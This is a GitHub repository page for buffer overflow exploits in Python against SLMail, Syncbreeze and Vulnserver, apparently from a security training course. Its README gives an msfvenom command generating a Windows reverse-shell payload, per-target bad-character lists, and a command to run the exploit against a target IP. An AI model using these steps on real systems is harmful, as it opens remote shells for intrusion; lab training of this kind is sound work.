Skip to content

Buffer overflow exploits for SLMail, Syncbreeze and Vulnserver processes in Python 🐍

Notifications You must be signed in to change notification settings

sathya-ghub/Buffer-Overflow-Exploits

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Buffer-Overflow exploits

A repository for HackerU's Buffer overflow exploits in Python 🐍

Steps to run:

1. Generate a payload

Use msfvenom to generate your payload

msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=YOUR IP LPORT=YOUR PORT -f python -b "\x00"

Bad characters for:

  • Slmail:
\x00\x0a\x0d
  • Syncbreeze:
\x00\x0a\x0d\x25\x26\x2b\x3d
  • Vulnserver:
\x00

Append the above payload to the exploit

2. Run

Ensure you have Python 2 or 3 installed. Provide the target IP address and port to the file and run:

python slmail.py 172.45.12.37 110

About

Buffer overflow exploits for SLMail, Syncbreeze and Vulnserver processes in Python 🐍

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages